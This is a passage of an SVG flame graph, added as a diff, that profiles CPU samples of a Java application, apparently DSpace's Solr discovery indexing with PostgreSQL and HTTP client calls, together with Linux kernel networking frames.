+<title>__sched_text_start (5 samples, 0.46%)</title><rect x="548.4" y="677" width="5.4" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="551.42" y="687.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Method:::invoke (747 samples, 68.03%)</title><rect x="372.2" y="1189" width="802.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="375.17" y="1199.5" >java/lang/reflect/Method:::invoke</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="758.0" y="917" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="760.98" y="927.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.09%)</title><rect x="802.0" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="805.04" y="927.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="581.7" y="965" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="584.73" y="975.5" ></text>
+</g>
+<g >
+<title>nft_hash_lookup_fast (2 samples, 0.18%)</title><rect x="298.0" y="773" width="2.2" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="301.01" y="783.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="759.1" y="933" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="762.05" y="943.5" ></text>
+</g>
+<g >
+<title>tcp_v4_send_synack (1 samples, 0.09%)</title><rect x="1078.2" y="165" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="175.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (8 samples, 0.73%)</title><rect x="393.7" y="901" width="8.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="396.66" y="911.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::forName0 (3 samples, 0.27%)</title><rect x="723.6" y="917" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="726.59" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (20 samples, 1.82%)</title><rect x="841.8" y="949" width="21.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="844.80" y="959.5" >o..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="1014.8" y="885" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1017.83" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (24 samples, 2.19%)</title><rect x="533.4" y="901" width="25.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="536.37" y="911.5" >o..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getName (52 samples, 4.74%)</title><rect x="467.8" y="917" width="55.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="470.81" y="927.5" >org/a..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="454.9" y="805" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="457.92" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="741" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::next (1 samples, 0.09%)</title><rect x="1030.9" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1033.95" y="943.5" ></text>
+</g>
+<g >
+<title>dev_hard_start_xmit (3 samples, 0.27%)</title><rect x="337.8" y="965" width="3.2" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="340.78" y="975.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.09%)</title><rect x="537.7" y="773" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="540.67" y="783.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (2 samples, 0.18%)</title><rect x="576.4" y="949" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="579.36" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/params/ModifiableSolrParams:::add (4 samples, 0.36%)</title><rect x="562.4" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="565.39" y="959.5" ></text>
+</g>
+<g >
+<title>__sys_recvfrom (47 samples, 4.28%)</title><rect x="87.4" y="1253" width="50.5" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="90.38" y="1263.5" >__sys..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="880.5" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="883.49" y="815.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="758.0" y="933" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="760.98" y="943.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="1018.1" y="853" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1021.05" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="811.7" y="885" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.71" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.27%)</title><rect x="1151.3" y="949" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="959.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.09%)</title><rect x="1150.2" y="885" width="1.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1153.24" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="1168.5" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1171.51" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="837.5" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="840.50" y="927.5" ></text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.09%)</title><rect x="132.5" y="1077" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="135.51" y="1087.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::&lt;init&gt; (16 samples, 1.46%)</title><rect x="385.1" y="933" width="17.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="388.06" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (115 samples, 10.47%)</title><rect x="892.3" y="949" width="123.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="895.31" y="959.5" >org/dspace/serv..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (7 samples, 0.64%)</title><rect x="853.6" y="853" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="863.5" ></text>
+</g>
+<g >
+<title>read_tsc (1 samples, 0.09%)</title><rect x="351.7" y="1125" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="354.75" y="1135.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="824.6" y="901" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="827.61" y="911.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read_port (1 samples, 0.09%)</title><rect x="421.6" y="533" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="752.6" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="755.60" y="927.5" ></text>
+</g>
+<g >
+<title>__vsnprintf_internal (1 samples, 0.09%)</title><rect x="10.0" y="1285" width="1.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="13.00" y="1295.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="867.6" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="837.5" y="901" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="840.50" y="911.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="581.7" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="584.73" y="959.5" ></text>
+</g>
+<g >
+<title>JVM_MonitorNotifyAll (1 samples, 0.09%)</title><rect x="850.4" y="853" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="853.40" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="755.8" y="837" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="758.83" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::study (2 samples, 0.18%)</title><rect x="921.3" y="725" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="735.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (1 samples, 0.09%)</title><rect x="134.7" y="1109" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="137.66" y="1119.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="726.8" y="917" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="729.81" y="927.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (1 samples, 0.09%)</title><rect x="366.8" y="1237" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="369.79" y="1247.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="460.3" y="837" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="463.29" y="847.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (22 samples, 2.00%)</title><rect x="306.6" y="837" width="23.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="309.61" y="847.5" >n..</text>
+</g>
+<g >
+<title>__vdso_gettimeofday (1 samples, 0.09%)</title><rect x="852.6" y="853" width="1.0" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="855.55" y="863.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::parseSql (1 samples, 0.09%)</title><rect x="1171.7" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1174.73" y="975.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::study (2 samples, 0.18%)</title><rect x="921.3" y="757" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="767.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (1 samples, 0.09%)</title><rect x="436.6" y="661" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="439.65" y="671.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/ObjectToArrayConverter:::getConvertibleTypes (1 samples, 0.09%)</title><rect x="703.2" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="706.17" y="895.5" ></text>
+</g>
+<g >
+<title>__nf_conntrack_find_get (2 samples, 0.18%)</title><rect x="213.1" y="997" width="2.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="216.11" y="1007.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_established (39 samples, 3.55%)</title><rect x="248.6" y="757" width="41.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="251.58" y="767.5" >tcp..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="421.6" y="773" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="783.5" ></text>
+</g>
+<g >
+<title>loopback_xmit (1 samples, 0.09%)</title><rect x="339.9" y="949" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="342.93" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (61 samples, 5.56%)</title><rect x="465.7" y="933" width="65.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="468.66" y="943.5" >org/apa..</text>
+</g>
+<g >
+<title>journal_end_buffer_io_sync (1 samples, 0.09%)</title><rect x="137.9" y="837" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="140.89" y="847.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (100 samples, 9.11%)</title><rect x="228.2" y="949" width="107.4" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="231.16" y="959.5" >__softirqentr..</text>
+</g>
+<g >
+<title>tcp_shutdown (1 samples, 0.09%)</title><rect x="1121.2" y="773" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1124.22" y="783.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService$ConverterAdapter:::getConvertibleTypes (1 samples, 0.09%)</title><rect x="701.0" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="704.02" y="879.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="1046.0" y="981" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1048.99" y="991.5" ></text>
+</g>
+<g >
+<title>do_softirq.part.0 (1 samples, 0.09%)</title><rect x="1078.2" y="453" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1081.23" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="839.7" y="917" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="842.65" y="927.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="878.3" y="757" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="881.34" y="767.5" ></text>
+</g>
+<g >
+<title>bbr_cwnd_event (1 samples, 0.09%)</title><rect x="350.7" y="1125" width="1.0" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="353.67" y="1135.5" ></text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (1 samples, 0.09%)</title><rect x="867.6" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="870.60" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="571.0" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="573.98" y="927.5" ></text>
+</g>
+<g >
+<title>bio_endio (1 samples, 0.09%)</title><rect x="137.9" y="1013" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="140.89" y="1023.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (20 samples, 1.82%)</title><rect x="205.6" y="1045" width="21.5" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="208.59" y="1055.5" >n..</text>
+</g>
+<g >
+<title>__tcp_transmit_skb (1 samples, 0.09%)</title><rect x="249.7" y="693" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="252.65" y="703.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="1083.6" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1086.61" y="895.5" ></text>
+</g>
+<g >
+<title>[unknown] (64 samples, 5.83%)</title><rect x="10.0" y="1317" width="68.8" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="13.00" y="1327.5" >[unknown]</text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::escape (1 samples, 0.09%)</title><rect x="927.8" y="741" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="930.78" y="751.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedHashMap:::get (1 samples, 0.09%)</title><rect x="1015.9" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1018.90" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%)</title><rect x="878.3" y="869" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="879.5" ></text>
+</g>
+<g >
+<title>iptable_filter_hook (1 samples, 0.09%)</title><rect x="202.4" y="1045" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="205.37" y="1055.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (5 samples, 0.46%)</title><rect x="221.7" y="1029" width="5.4" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="224.71" y="1039.5" ></text>
+</g>
+<g >
+<title>__errno_location (1 samples, 0.09%)</title><rect x="1079.3" y="869" width="1.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="1082.31" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.18%)</title><rect x="760.1" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="827.8" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="830.83" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (2 samples, 0.18%)</title><rect x="873.0" y="949" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1165.3" y="965" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.28" y="975.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="568.8" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="571.83" y="927.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.09%)</title><rect x="964.3" y="853" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="967.32" y="863.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (5 samples, 0.46%)</title><rect x="785.9" y="853" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="863.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/HasBitstreamsSSIPlugin:::additionalIndex (1 samples, 0.09%)</title><rect x="567.8" y="965" width="1.0" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="570.76" y="975.5" ></text>
+</g>
+<g >
+<title>tcp_recvmsg (44 samples, 4.01%)</title><rect x="89.5" y="1205" width="47.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="92.53" y="1215.5" >tcp_..</text>
+</g>
+<g >
+<title>__local_bh_enable_ip (101 samples, 9.20%)</title><rect x="228.2" y="997" width="108.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="231.16" y="1007.5" >__local_bh_en..</text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%)</title><rect x="1158.8" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.83" y="863.5" ></text>
+</g>
+<g >
+<title>bio_endio (1 samples, 0.09%)</title><rect x="137.9" y="965" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="140.89" y="975.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.09%)</title><rect x="864.4" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="867.37" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList$ListItr:::next (1 samples, 0.09%)</title><rect x="382.9" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="385.91" y="943.5" ></text>
+</g>
+<g >
+<title>__sys_connect (1 samples, 0.09%)</title><rect x="1078.2" y="693" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1081.23" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Begin:::match (1 samples, 0.09%)</title><rect x="1144.9" y="949" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.86" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (4 samples, 0.36%)</title><rect x="740.8" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="943.5" ></text>
+</g>
+<g >
+<title>ext4_map_blocks (1 samples, 0.09%)</title><rect x="11.1" y="1061" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1071.5" ></text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="466.7" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="469.74" y="911.5" ></text>
+</g>
+<g >
+<title>tcp_ack (11 samples, 1.00%)</title><rect x="275.4" y="741" width="11.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="278.45" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="572.1" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="575.06" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::complete (2 samples, 0.18%)</title><rect x="1172.8" y="997" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1175.81" y="1007.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/BitstreamContentStream:::&lt;init&gt; (2 samples, 0.18%)</title><rect x="873.0" y="965" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="975.5" ></text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.09%)</title><rect x="831.1" y="933" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="834.06" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (48 samples, 4.37%)</title><rect x="1066.4" y="949" width="51.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1069.41" y="959.5" >org/a..</text>
+</g>
+<g >
+<title>org/dspace/discovery/BitstreamContentStream:::getStream (14 samples, 1.28%)</title><rect x="408.7" y="933" width="15.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="411.71" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (5 samples, 0.46%)</title><rect x="1035.2" y="885" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1038.25" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/PoolingClientConnectionManager:::releaseConnection (1 samples, 0.09%)</title><rect x="464.6" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="467.59" y="943.5" ></text>
+</g>
+<g >
+<title>tcp_write_xmit (1 samples, 0.09%)</title><rect x="1121.2" y="725" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1124.22" y="735.5" ></text>
+</g>
+<g >
+<title>available_idle_cpu (2 samples, 0.18%)</title><rect x="255.0" y="613" width="2.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="258.03" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (6 samples, 0.55%)</title><rect x="1034.2" y="933" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1037.17" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="859.0" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="862.00" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="418.4" y="741" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="421.38" y="751.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="885" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="895.5" ></text>
+</g>
+<g >
+<title>ext4_mark_inode_dirty (2 samples, 0.18%)</title><rect x="409.8" y="549" width="2.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="412.78" y="559.5" ></text>
+</g>
+<g >
+<title>clock_gettime@GLIBC_2.2.5 (1 samples, 0.09%)</title><rect x="1098.7" y="773" width="1.0" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="1101.65" y="783.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::getBrowseIndices (26 samples, 2.37%)</title><rect x="905.2" y="853" width="28.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="908.21" y="863.5" >o..</text>
+</g>
+<g >
+<title>schedule (61 samples, 5.56%)</title><rect x="13.2" y="1189" width="65.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="16.22" y="1199.5" >schedule</text>
+</g>
+<g >
+<title>generic_perform_write (1 samples, 0.09%)</title><rect x="1139.5" y="709" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1142.49" y="719.5" ></text>
+</g>
+<g >
+<title>dequeue_entity (5 samples, 0.46%)</title><rect x="104.6" y="1077" width="5.3" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="107.57" y="1087.5" ></text>
+</g>
+<g >
+<title>ExceptionBlob (1 samples, 0.09%)</title><rect x="1090.1" y="917" width="1.0" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1093.05" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (5 samples, 0.46%)</title><rect x="914.9" y="821" width="5.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="917.88" y="831.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%)</title><rect x="740.8" y="837" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="847.5" ></text>
+</g>
+<g >
+<title>__GI___shutdown (1 samples, 0.09%)</title><rect x="1121.2" y="869" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1124.22" y="879.5" ></text>
+</g>
+<g >
